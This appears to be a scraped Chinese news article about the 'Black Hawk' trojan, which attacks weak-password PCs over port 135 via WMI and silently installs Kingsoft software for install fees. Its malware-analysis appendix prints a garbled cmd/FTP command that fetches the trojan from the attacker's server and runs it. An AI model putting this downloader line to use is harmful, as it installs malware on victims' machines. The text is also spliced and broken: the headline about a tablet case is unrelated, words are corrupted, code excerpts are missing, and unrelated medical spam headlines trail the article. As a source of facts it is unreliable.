疑似新款iadro保护壳暴光缘由

电脑无故多出金山毒霸？实为“黑鹰”病毒作怪

近日，针对媒体披露金山猎豹浏览器借病毒推行一事，金山联盟于2月26日发布公告，承认情况属实并许诺严肃处理。但是在公告发布一周后，有友发现金山软件病毒推广愈演愈烈，并对截获的名为黑鹰的下载者病毒进行了分析，证实包括金山毒霸、金山卫士、金山浏览器等多款软件借病毒推广，金山的严打公告真实性也因此遭到严重质疑。

图1：最新发现的黑鹰病毒捆绑推广金山软件

经安全工程师分析，黑鹰病毒主要针对存在弱密码的计算机进行攻击，在进入用户电脑后，黑鹰病毒就会自动下载并安装推广软件，其中就包括金山毒霸，金山卫士，猎豹浏览器，无极影音，6080游戏，Dushow美女视频合集等(图1)。在用户电脑的直接表现就是，桌面上平空出现多款软件。

图2：用户桌面上出现的这些软件系木马自动安装

此前，在国内多家媒体报道的重压之下，金山同盟承认病毒推行问题存在，但将推给参与推广的同盟会员的做法被民认为诚意不足。但目前看来，金山公告只是掩人耳目。业内分析表示，一个金山猎豹浏览器有效安装是0.4元，金山毒霸是0.5元，酷屏是0.2元。病毒制造者也看准了金山背后腾讯和百度两大金主。

目前，虽然金山静默安装器、软件捆绑静默包URL等推广方式非常隐蔽，但还是被愤怒的民揪了出来，有友在微博上愤怒的质问金山：你一个杀毒厂商，和病毒木马蛇鼠一窝算怎么回事儿，回头就卸载了金山的所有产品。

由于该木马主要通过扫描135端口弱口令的方式寻觅攻击目标，所以安全专家建议民应提高安全防范意识，使用卡巴斯基、360、Nod32等具备弱口令防护功能的专业安全软件提高电脑安全防护能力。

附：黑鹰病毒样本分析：

1、黑客对一个段进行135端口扫描，对存在弱口令的计算机尝试使用wmi进行远程登录，一旦登录成功，便可远程执行指令。攻击成功后，黑客会通过wmi启动一个e，执行以下指令，下载这个下载者木马并履行：

/c @echo open t@echo t@echo t@echo t@echo get t@echo t@ftp -s:tdel e黑客的ftp服务器以下：

2、木马启动以后，会访问一个百度空间的地址(，获取要下载程序的数据。

3、下载者木马从从中抓取页的代码：

4、下载者从页中分离下载链接数据：

5、拿到这些数据以后，和百度盘的链接组合(，拼装成一个完全的下载地址，下载者中拼装数据的代码：

6、拼装好的链接，对应的文件：

7、下载者被捕获时下载的文件有;

8、分别对应的有金山毒霸，金山卫士，金山浏览器，无极影音，6080游戏，Dushow美女视频合集等。

9、下载者中准备下载文件的代码：

10、下载者木马在安装程序

老君炉藤黄健骨丸治骨质疏松吗

常州医治牛皮癣医院

宝鸡男科医院哪家好

宁尔康退热冰露怎么卖

小宝宝脸色发黄怎么回事

儿童补钙的几个关键阶段

哪些中药能消肿止痛
腹泻可以用远大医药立可安吗
冠心病的发生原因有哪些